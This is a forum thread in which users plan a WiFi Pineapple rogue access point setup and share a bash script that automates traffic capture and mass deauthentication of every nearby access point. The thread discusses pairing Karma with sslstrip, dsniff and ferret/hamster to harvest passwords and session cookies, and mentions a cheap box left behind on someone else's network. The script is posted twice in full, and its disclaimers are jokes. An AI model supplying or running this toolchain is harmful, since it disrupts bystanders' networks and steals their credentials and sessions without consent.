Jump to content

Hardware Setups & Scripts


diggler
 Share

Recommended Posts

1. Is it true that we can use the airdrop-ng tool to deauth at the same time, on the same wireless adapter, that we are sharing internet from (ex. wlan0/mon0)?

2. Depending on the answer either A or B will be the better hardware setup.

A

- laptop with BTR1 physically installed on entire disk

- connect to internet with wlan0 (built in laptop wireless adapter)

- deauth with wlan1 (USB wireless adapter -- ALFA)

- connect to AP51 MK3 with eth0 (built in laptop wired adapter)

or

B

- laptop with BTR1 physically installed on entire disk

- connect to internet with wlan0 (built in laptop wireless adapter)

- deauth with wlan0 (at the same time with same wireless adapter)

- connect to AP51 MK3 with eth0 (built in laptop wired adapter)

3. I'd like to combine a number of scripts to function with this type of hardware / software setup. What I'm thinking is:

-first get internet going on the laptop (wicd or command based)

-run master script (wp3 on steroids)

-have all tools, besides karma, run off of BT5R1 (why? because of hardware storage/power/dependency restrictions/limitations)

-mk3 pineapple WEBGUI still very handy for watching connection / association / dhcp logs etc

-get the wp3.sh script to autostart karma

-in new steroid script setup:

xterm used for window control

ferret and hamster for sidejacking

sslstrip for https

dsniff for all other username/passwords (or ettercap)

urlsnarf to monitor visited urls

driftnet for fun

firefox needs to be configured with a proxy of 127.0.0.1:1234

url for hamster server is http://hamster

-tell these tools in a new script to log in a new folder on the desktop (or wherever) to make it easier to find all the new data instead of having to browse diff DIRs per tool

4. I like the functionality these scripts offer, but they'll need some modification

-http://www.backtrack-linux.org/forums/backtrack-5-experts-section/45123-another-script-sidejacking-%5Bsidejackssl-sh%5D.html

-http://teh-geek.com/?p=565

-itsm0ld's script

-obviously add as much to this to wp3.sh in the right order of operations

5. Goal being, connect all HW, turn-on laptop, get an internet connection, run one script (or two), follow prompts and start watching the goodness.

6. What seems messy in all these scripts is the different IPTABLE rules for each one. I think the only rule that would need to be added to wp3.sh is the SSLSTRIP one

-iptables -t nat -A OUTPUT -p tcp --dport 80 -j DNAT --to-destination 127.0.0.1:8080

7. have a terminal pop-up so you can launch airdrop-ng deauth when ready

-autolaunch terminal with Darren's airdrop-ng script for mass deauth except us (but make sure we still have to hit enter, incase we dont want or need to do this off the bat)

touch deauth.conf

nano deauth.conf

a/00:00:00:00:00:00|any <-- mac of our AP51 AP

d/any|any

airdrop-ng -i mon0 -t cap-01.csv -r deauth.conf

8. assume that if the script was written now that BT5R1 had just had a apt-get update; apt-get upgrade -y done on it. updates sslstrip to .9 latest and all the tools to what we need i believe

Edited by diggler
Link to comment
Share on other sites

1) pretty sure no

2) A

3) A bit overkill, I only load the tools I need at that time.

4) Add it, modify it, it's open source; I can almost guarantee you will run into issues though.

5) Cool

6) So modify it if you want it there. I might want to suggest man iptables

7) Easy enough to do inside a script, google if you don't know how.

8) Don't get what you are saying on this one. But I have a script to update BT5 and Metasploit and S.E.T. I made.

Link to comment
Share on other sites

1. Why is there a deauth tool on the pineapple WEBGUI then? because people are connecting through it sharing internet access but we have the ability to deauth at the same time through it...

3. Agreed : / got a little carried away there... I would really like SSLTRIP/DNSIFF/FERRET+HAMSTER to run off the bat (with airdrop-ng deauth option quickly accessible). Someone's already expressed some interest to help, so I'll post what is created in time.

1) pretty sure no

2) A

3) A bit overkill, I only load the tools I need at that time.

4) Add it, modify it, it's open source; I can almost guarantee you will run into issues though.

5) Cool

6) So modify it if you want it there. I might want to suggest man iptables

7) Easy enough to do inside a script, google if you don't know how.

8) Don't get what you are saying on this one. But I have a script to update BT5 and Metasploit and S.E.T. I made.

Edited by diggler
Link to comment
Share on other sites

Most people don't login to FB, GMAIL, ETC... their cookies do it for them. The chance that you catch someone logging in is lower, than scraping cookies while their browsing, especially in a deauth scenario

I dont understand the need for side-jacking if you are using SSL Strip and can see Unames and Pwords.

Edited by diggler
Link to comment
Share on other sites

This is right up my alley. I too want the "deauth everything around me then karma everyone to me and allow for remote gui/terminal access by me" process via scripting - but I wat it done automatically at boot up. What I'm looking for the perfect Svartkast/dropbox (see http://www.irongeek.com/i.php?page=videos/derbycon1/adrian-crenshaw-building-a-svartkast-cheap-hardware-to-leave-behind-on-someone-elses-network for terminology and the basic premise).

My noob brain encounters this problem: If you iwconfig a stock pineapple, you'll see mon.wlan0 - this is locked on channel 11 by default, thereby removing your ability to deauth people on any channel but 11 without bringing down this interface (airmon-ng stop mon.wlan0). So if you want to do the whole "deauth everyone around me", at bootup you'd have to either stop mon.wlan0 (no idea what this actually does/haven't figured it out yet) everytime, or somehow prevent it from starting at bootup, then start airmon-ng on wlan0, do an airodump-ng that pipes all the BSSIDs and channels in range into your startup script, then airmon-ng stop mon0, restart it on those channels and deauth the BSSIDs one channel/bssid at a time. After everyones deauth'd, you then bring mon.wlan0 back up (assuming Jasagar somehow needs it) and startup karma. Then begin tcpdump/wireshark capturing for later consumption via scp.

I plan to accomplish this with a Raspberrypi (raspberrypi.org) but need to first confront the major issue of - by the time it deauths any and all AP's around it, won't people have rejoined their network? The deauth tests I've run against my crappy netgear router work only if I deauth with an external (not on pineapple) monitor mode enabled wifi adapter. When I deauth with the pineapple, it takes too long for the pineapple to get mon.wlan0 back up and running - my test laptop has already reconnected to my crap netgear. More tests with different routers need to be done for my results to be conclusive, and I need to find out what mon.wlan0 is all about...but the idea of a small box I can drop anywhere that houses a credit card sized computer and a pineapple that in total costs $70 is too amazing to pass up.

Link to comment
Share on other sites

I apologize in advance, this wll be a short reply because im on my phone.

If you invest in a different hardware setup, where you have two wireless adapters (ex wan0 and wlan1) and 1 ethernet adapter you can use one to connect to to internet, one to run pineapple and karma and the spare wlan1 to issue deauths.

This is right up my alley. I too want the "deauth everything around me then karma everyone to me and allow for remote gui/terminal access by me" process via scripting - but I wat it done automatically at boot up. What I'm looking for the perfect Svartkast/dropbox (see http://www.irongeek....e-elses-network for terminology and the basic premise).

My noob brain encounters this problem: If you iwconfig a stock pineapple, you'll see mon.wlan0 - this is locked on channel 11 by default, thereby removing your ability to deauth people on any channel but 11 without bringing down this interface (airmon-ng stop mon.wlan0). So if you want to do the whole "deauth everyone around me", at bootup you'd have to either stop mon.wlan0 (no idea what this actually does/haven't figured it out yet) everytime, or somehow prevent it from starting at bootup, then start airmon-ng on wlan0, do an airodump-ng that pipes all the BSSIDs and channels in range into your startup script, then airmon-ng stop mon0, restart it on those channels and deauth the BSSIDs one channel/bssid at a time. After everyones deauth'd, you then bring mon.wlan0 back up (assuming Jasagar somehow needs it) and startup karma. Then begin tcpdump/wireshark capturing for later consumption via scp.

I plan to accomplish this with a Raspberrypi (raspberrypi.org) but need to first confront the major issue of - by the time it deauths any and all AP's around it, won't people have rejoined their network? The deauth tests I've run against my crappy netgear router work only if I deauth with an external (not on pineapple) monitor mode enabled wifi adapter. When I deauth with the pineapple, it takes too long for the pineapple to get mon.wlan0 back up and running - my test laptop has already reconnected to my crap netgear. More tests with different routers need to be done for my results to be conclusive, and I need to find out what mon.wlan0 is all about...but the idea of a small box I can drop anywhere that houses a credit card sized computer and a pineapple that in total costs $70 is too amazing to pass up.

Link to comment
Share on other sites

I am unsure whether is has been mentioned, but the pineapple can deauth clients for you.

It can do so even when running karma.

However, deauth is not working correctly through the pineapple interface, a fix has already been done and will be in the next firmware.

Best,

Sebkinne

Link to comment
Share on other sites

I didnt know that, but it makes a big difference in how I'm thinking of setting up my system.

Can you explain why that's possible on the wireless interface of the pineapple and not the ALFA USB interface.

Also, what tool is issuing the deauth? Is it possible to use the airdrop-ng command that I've referenced in the first post of this thread?

Manny thanks Seb... Cheers...

I am unsure whether is has been mentioned, but the pineapple can deauth clients for you.

It can do so even when running karma.

However, deauth is not working correctly through the pineapple interface, a fix has already been done and will be in the next firmware.

Best,

Sebkinne

Edited by diggler
Link to comment
Share on other sites

Also, what tool is issuing the deauth? Is it possible to use the airdrop-ng command that I've referenced in the first post of this thread?

I think most people (well I am and the pineapple but he's broken right now) using aireplay-ng

If you haven't seen this thread, check it out!

http://www.rx8club.com/showthread.php?t=180037

Seriously, its interesting, grab a coke or a beer, something.

Link to comment
Share on other sites

Is it possible to get airdrop-ng on the pineapple as well then? Otherwise, I would need the original HW setup in the first post of this thread (A), and airdrop-ng off the ALFA USB.

I think most people (well I am and the pineapple but he's broken right now) using aireplay-ng

If you haven't seen this thread, check it out!

http://www.rx8club.c...ad.php?t=180037

Seriously, its interesting, grab a coke or a beer, something.

Link to comment
Share on other sites

Is it possible to get airdrop-ng on the pineapple as well then? Otherwise, I would need the original HW setup in the first post of this thread (A), and airdrop-ng off the ALFA USB.

Heres the deal as I understand it Diggler - at current time, you can't deauth as you want to using the Pineapple. The *best* way to do it with current firmware is to have an alfa usb attached to your computer to do the deauths in addition to the pineapple running that will then offer up karma'd AP's to the kicked off victims. However, this all could change with Seb's mysterious new firmware - Seb, do you have an ETA on delivery of your new firmware? You rock man, can't wait to see what you have in store for us...maybe a little preview/changelog? :)

Hope this helps

telot

Link to comment
Share on other sites

  • 1 year later...

Heres a script I made way back in 2011. It was meant to be used with the mark3, but I don't think anything has changed. This script makes some assumptions about your setup that you should verify/modify - its all mentioned in the first blahb of commented text. Hope it helps

#!/bin/sh
#telot presents....:::drum roll:::
#One wicked ass nasty script that automates the ICS for the pineapple, begins packet capturing, and deauths every access point/client nearby! Enjoy!
#Note that this script makes quite a few assumptions. They are:
#You are using backtrack5R1.
#Your interface that is connecting to the internet is wlan0
#Your interface that is connecting to the pineapple is eth0
#You have a alfa realtek usb card capable of monitor mode plugged in.
#You have airdrop-ng installed and configured. This is a bit of a pita. If you don't want the deauth functions, comment it out (its at the very bottom of this script).
#You have not run wp3.sh or any other network configuration stuff.
#You have your pineapple configured to autostart karma at bootup.
#This script is meant to run on your laptop upon bootup.
#
#Also in this script, I'm using my smartphone's wifi hotspot feature, and that is why I'm using wpa_supplicant.
#So the internet I'm serving up in my pentest lab is actually run through my cellphone.
#So if you're dumb enough to do this in public to real people, use the local wifi. You don't want "real" targets eating up your monthly cellphone bandwidth.
#
#
#Disclaimer: Herp a derp don't use this in public. Don't use this on anyone but your wife. Don't invade other peoples privacy. Don't be an asshole. With great power comes great...blah blah blah
#
#
#I'm keeping most configuration and capture files on the desktop for ease.
cd /root/Desktop/
#Again, I'm using wpa because I'm running this through my cellphones hotspot. Remove the wpa_supplicant line and replace it with the below commented line.
#iwconfig wlan0 essid EssidOfAPyouWantToUse
wpa_supplicant -B Dwext -i wlan0 -c Jack.conf
dhclient wlan0
#Now I just copy pasta'd most of this from the wp3.sh - I use all defaults for my setup, if you do not, change as necessary.
#Bring up Ethernet Interface directly connected to Pineapple
ifconfig eth0 172.16.42.42 netmask 255.255.255.0 up
# Enable IP Forwarding
echo '1' > /proc/sys/net/ipv4/ip_forward
echo -n "IP Forwarding enabled. /proc/sys/net/ipv4/ip_forward set to "
cat /proc/sys/net/ipv4/ip_forward
#clear chains and rules
iptables -X
iptables -F
echo iptables chains and rules cleared
#setup IP forwarding
iptables -A FORWARD -i wlan0 -o wlan0 -s 172.16.42.0/24 -m state --state NEW -j ACCEPT
iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A POSTROUTING -t nat -j MASQUERADE
echo IP Forwarding Enabled
#remove default route
route del default
echo Default route removed
#add default gateway
route add default gw 192.168.1.1 wlan0
echo Pineapple Default Gateway Configured
#instructions
#echo All set. Now on the Pineapple issue: route add default gw $pineapplehostip br-lan
ping -c3 172.16.42.1
if [ $? -eq 0 ]; then
echo "ICS configuration successful."
#echo "Issuing on Pineapple: route add default gw $pineapplehostip br-lan"
#echo " ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan'"
#echo "Enter Pineapple password if prompted"
#ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan'
fi
echo ""
echo "Browse to http://172.16.42.1/pineapple -- Happy Hacking!"
echo ""
#Now on to the fun stuff!
#
#
#
#Now we autostart wireshark and begin capturing the pineapple traffic. I use screen -d -m to hide the console, as for some reason my wireshark is bugged out and hangs a bit.
#Remember to screen -r back to it and get rid of it when you're done.
screen -d -m wireshark -i eth0 -k -w sharkcap &
#This next section requires an additional wifi card that supports monitor mode. I have a usb alfa realtek one (similar to those found in the hakshop).
#This is also created in a detached screen. So remember to cleanup when you're done!
#
#
#Now we deauth every access point around us. Make sure to set a conf file (in my case, I call if yourescrewed.conf) for airdrop with your allows and denys.
#I set mine to allow the pineapple & my hotspot and deny everyone else.
ifconfig wlan1 up
airmon-ng start wlan1
cd /pentest/wireless/airdrop-ng/
screen -d -m airodump-ng mon0 -w capfile --output-format csv
sleep 20
python airdrop-ng -i mon0 -t capfile-01.csv -r yourescrewed.conf
telot
Edited by telot
Link to comment
Share on other sites

Heres a script I made way back in 2011. It was meant to be used with the mark3, but I don't think anything has changed. This script makes some assumptions about your setup that you should verify/modify - its all mentioned in the first blahb of commented text. Hope it helps

#!/bin/sh
#telot presents....:::drum roll:::
#One wicked ass nasty script that automates the ICS for the pineapple, begins packet capturing, and deauths every access point/client nearby! Enjoy!
#Note that this script makes quite a few assumptions. They are:
#You are using backtrack5R1.
#Your interface that is connecting to the internet is wlan0
#Your interface that is connecting to the pineapple is eth0
#You have a alfa realtek usb card capable of monitor mode plugged in.
#You have airdrop-ng installed and configured. This is a bit of a pita. If you don't want the deauth functions, comment it out (its at the very bottom of this script).
#You have not run wp3.sh or any other network configuration stuff.
#You have your pineapple configured to autostart karma at bootup.
#This script is meant to run on your laptop upon bootup.
#
#Also in this script, I'm using my smartphone's wifi hotspot feature, and that is why I'm using wpa_supplicant.
#So the internet I'm serving up in my pentest lab is actually run through my cellphone.
#So if you're dumb enough to do this in public to real people, use the local wifi. You don't want "real" targets eating up your monthly cellphone bandwidth.
#
#
#Disclaimer: Herp a derp don't use this in public. Don't use this on anyone but your wife. Don't invade other peoples privacy. Don't be an asshole. With great power comes great...blah blah blah
#
#
#I'm keeping most configuration and capture files on the desktop for ease.
cd /root/Desktop/
#Again, I'm using wpa because I'm running this through my cellphones hotspot. Remove the wpa_supplicant line and replace it with the below commented line.
#iwconfig wlan0 essid EssidOfAPyouWantToUse
wpa_supplicant -B Dwext -i wlan0 -c Jack.conf
dhclient wlan0
#Now I just copy pasta'd most of this from the wp3.sh - I use all defaults for my setup, if you do not, change as necessary.
#Bring up Ethernet Interface directly connected to Pineapple
ifconfig eth0 172.16.42.42 netmask 255.255.255.0 up
# Enable IP Forwarding
echo '1' > /proc/sys/net/ipv4/ip_forward
echo -n "IP Forwarding enabled. /proc/sys/net/ipv4/ip_forward set to "
cat /proc/sys/net/ipv4/ip_forward
#clear chains and rules
iptables -X
iptables -F
echo iptables chains and rules cleared
#setup IP forwarding
iptables -A FORWARD -i wlan0 -o wlan0 -s 172.16.42.0/24 -m state --state NEW -j ACCEPT
iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A POSTROUTING -t nat -j MASQUERADE
echo IP Forwarding Enabled
#remove default route
route del default
echo Default route removed
#add default gateway
route add default gw 192.168.1.1 wlan0
echo Pineapple Default Gateway Configured
#instructions
#echo All set. Now on the Pineapple issue: route add default gw $pineapplehostip br-lan
ping -c3 172.16.42.1
if [ $? -eq 0 ]; then
echo "ICS configuration successful."
#echo "Issuing on Pineapple: route add default gw $pineapplehostip br-lan"
#echo " ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan'"
#echo "Enter Pineapple password if prompted"
#ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan'
fi
echo ""
echo "Browse to http://172.16.42.1/pineapple -- Happy Hacking!"
echo ""
#Now on to the fun stuff!
#
#
#
#Now we autostart wireshark and begin capturing the pineapple traffic. I use screen -d -m to hide the console, as for some reason my wireshark is bugged out and hangs a bit.
#Remember to screen -r back to it and get rid of it when you're done.
screen -d -m wireshark -i eth0 -k -w sharkcap &
#This next section requires an additional wifi card that supports monitor mode. I have a usb alfa realtek one (similar to those found in the hakshop).
#This is also created in a detached screen. So remember to cleanup when you're done!
#
#
#Now we deauth every access point around us. Make sure to set a conf file (in my case, I call if yourescrewed.conf) for airdrop with your allows and denys.
#I set mine to allow the pineapple & my hotspot and deny everyone else.
ifconfig wlan1 up
airmon-ng start wlan1
cd /pentest/wireless/airdrop-ng/
screen -d -m airodump-ng mon0 -w capfile --output-format csv
sleep 20
python airdrop-ng -i mon0 -t capfile-01.csv -r yourescrewed.conf
telot

Many thanks!

Link to comment
Share on other sites

Ooo! I have the best answer? Mr. P, where do I find the reward pastries?

;) Glad I could help

telot

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...